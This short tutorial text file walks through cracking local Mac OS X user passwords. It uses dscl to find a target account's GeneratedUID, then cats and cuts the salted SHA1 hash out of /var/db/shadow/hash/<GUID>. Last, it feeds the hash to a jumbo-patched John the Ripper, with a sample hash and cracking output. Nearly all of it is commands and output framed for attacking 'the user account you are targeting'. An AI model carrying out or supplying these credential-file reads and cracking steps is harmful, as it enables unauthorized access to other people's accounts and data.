 ==============================
 = Cracking mac osx passwords =
 ==============================



/*==========================================================================================*/

Password hashes are stored in the /var/db/shadow/hash/<GUID> file


ls /Users


Type the following command and then press return
(Replacing username with the user account you are targeting)

dscl localhost -read /Search/Users/username | grep GeneratedUID | cut -c15-


*===============================================================================================================*/

extracting the hashes

Next, we want to extract the SHA1 hash from the shadow file. For this, we do the following:

cat /var/db/shadow/hash/A66BCB30-2413-422A-A574-DE03108F8AF2 | cut -c169-216

Note: Replace the above GUID with the one you have extracted from the previous step.

You should have been returned with a SHA1 hash that looks similar to the following:
33BA7C74C318F5D3EF40EB25E1C42F312ACF905E20540226



*===============================================================================================================*/

cracking the password

At this point we are ready to crack the OS X passwords. For this step we will need a patched version of the password cracking utility John The Ripper. The patch (Jumbo Patch) we require will allow us to crack salted SHA1 passwords (referred to as XSHA in John). The patch can be downloaded from the following locations:

Windows
Mac OS X
Unix – Tutorial on how to patch
Once we have download/patched John, the extracted hash and username should be placed in a text file. For this example I have added the username ‘bob’ and bob’s hash (that I obtained in STEP 2) into a file called sha1.txt. The file has the following format:

bob:33BA7C74C318F5D3EF40EB25E1C42F312ACF905E20540226

We can then use John the crack the password:

# ./john sha1.txt

If John is successful in recognising the hash, the following message will be displayed:
”Loaded 1 password hash (Mac OS X 10.4+ salted SHA1 [32/64])”

A successful cracking attempt will appear as follows:

password (bob)
guesses: 1 time: 0:00:00:00 100% (2) c/s: 153000 trying: password


